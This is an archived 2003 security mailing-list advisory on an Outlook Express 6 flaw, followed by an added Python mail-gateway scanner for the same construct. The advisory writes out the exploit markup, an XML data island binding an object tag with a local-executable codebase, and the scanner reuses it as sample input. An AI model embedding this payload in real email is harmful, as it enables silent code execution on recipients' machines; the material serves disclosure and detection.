O UT LO OK E XPRE SS 6 .00 : broken
From: http-equiv@excite.com
Date: 02/22/03
Date: Sat, 22 Feb 2003 15:36:39 -0000
From: "http-equiv@excite.com" <http-equiv@MALWARE.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Saturday, February 22, 2003
Technical silent delivery and installation of an executable with no client
input other than reading an email or viewing a newsgroup message.
Outlook Express 6.00 SP1 Cumulative Pack 1 2 3 4 whatever.
This should not be possible.
When viewing an email message or a newsgroup message, Outlook Express
creates a temp file in the Internet Explorer cache. From here
security should be governed by Internet Explorer's security settings.
In an html email with internet zone applied, this will not function:
<o bject classid="clsi d:1 1 1 1 1 1 1 1-1 1 1 1-1 1 1 1-1 1 1 1"
code base="C:\WINDOWS\FTP.EXE"></object>
[screen shot: http://www.malware.com/tsktsk.png 11KB]
In an html email message or newsgroup message with internet zone
applied this will function:
<xml id=oExec> <security><exploit> <![CDATA[ <o bject id="oFile"
classid="clsi d:1 1 1 1 1 1 1 1-1 1 1 1-1 1 1 1-1 1 1 1"
code base="C:\WINDOWS\FTP.EXE"></object>]]></exploit></security></xml>
<SPAN dataFld=exploit dataFormatAs=html
dataSrc=#oExec></SPAN>
courtesy of: http://sec.greymagic.com/adv/gm001-ie/
[screen shot: http://www.malware.com/tsktsktsk.png 11KB]
NOTE: that default installations of Outlook Express 6.00 are with
restricted zone applied. However there still remain many 'happy
people' out there that enjoy their html mail messages and html
newsgroup messages, and coupling the above with any one of a million
other unsolved problems now and in the future with Internet Explorer
and Outlook Express, including a new
http://www.malware.com/stench.html we are back in business.
Notes: This is supposed to be patched:
http://microsoft.com/technet/security/bulletin/MS02-015.asp 28 March
2002
Keywords: experts Academic Advisory Board Think Tank security concepts
-- http://www.malware.com
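A mail-gateway style check for the construct described in the message above, added here as an example and not part of the original post: it flags an XML data island whose CDATA holds an object element with a codebase attribute when some element binds to that island with dataFormatAs=html. The function and constant names are hypothetical, and the two sample bodies are the post's own snippets, copied with their split spellings.

```python
import re

ISLAND = re.compile(r"<xml\b[^>]*\bid\s*=\s*[\"']?([\w-]+)[^>]*>(.*?)</xml\s*>", re.I | re.S)
CDATA = re.compile(r"<!\[CDATA\[(.*?)\]\]>", re.S)
TAG = re.compile(r"<[a-z][^>]*>", re.I | re.S)
DATASRC = re.compile(r"\bdatasrc\s*=\s*[\"']?#([\w-]+)", re.I)
AS_HTML = re.compile(r"\bdataformatas\s*=\s*[\"']?html\b", re.I)
OBJECT = re.compile(r"<object[^>]*codebase=", re.I)

# Both snippets are copied verbatim from the post, split spellings included.
BLOCKED = r'''<o bject classid="clsi d:1 1 1 1 1 1 1 1-1 1 1 1-1 1 1 1-1 1 1 1"
code base="C:\WINDOWS\FTP.EXE"></object>'''
BYPASS = r'''<xml id=oExec> <security><exploit> <![CDATA[ <o bject id="oFile"
classid="clsi d:1 1 1 1 1 1 1 1-1 1 1 1-1 1 1 1-1 1 1 1"
code base="C:\WINDOWS\FTP.EXE"></object>]]></exploit></security></xml>
<SPAN dataFld=exploit dataFormatAs=html
dataSrc=#oExec></SPAN>'''


def has_object_codebase(fragment):
    # Whitespace is dropped first so "o bject" / "code base" still match.
    return bool(OBJECT.search(re.sub(r"\s+", "", fragment)))


def scan_html_body(html):
    """Return sorted (kind, island_id) findings for one HTML message body."""
    findings = set()
    # Data islands whose CDATA carries an object element with a codebase.
    armed = set()
    for island in ISLAND.finditer(html):
        if any(has_object_codebase(c) for c in CDATA.findall(island.group(2))):
            armed.add(island.group(1).lower())
    # Elements bound to such an island that ask for the field rendered as HTML.
    for tag in TAG.findall(html):
        src = DATASRC.search(tag)
        if src and AS_HTML.search(tag) and src.group(1).lower() in armed:
            findings.add(("databound-object", src.group(1).lower()))
    # A plain object/codebase outside any island: the form the post says fails.
    if has_object_codebase(ISLAND.sub("", html)):
        findings.add(("direct-object", ""))
    return sorted(findings)


if __name__ == "__main__":
    for name, body in (("blocked form", BLOCKED), ("data-bound form", BYPASS)):
        print(name, scan_html_body(body))
```
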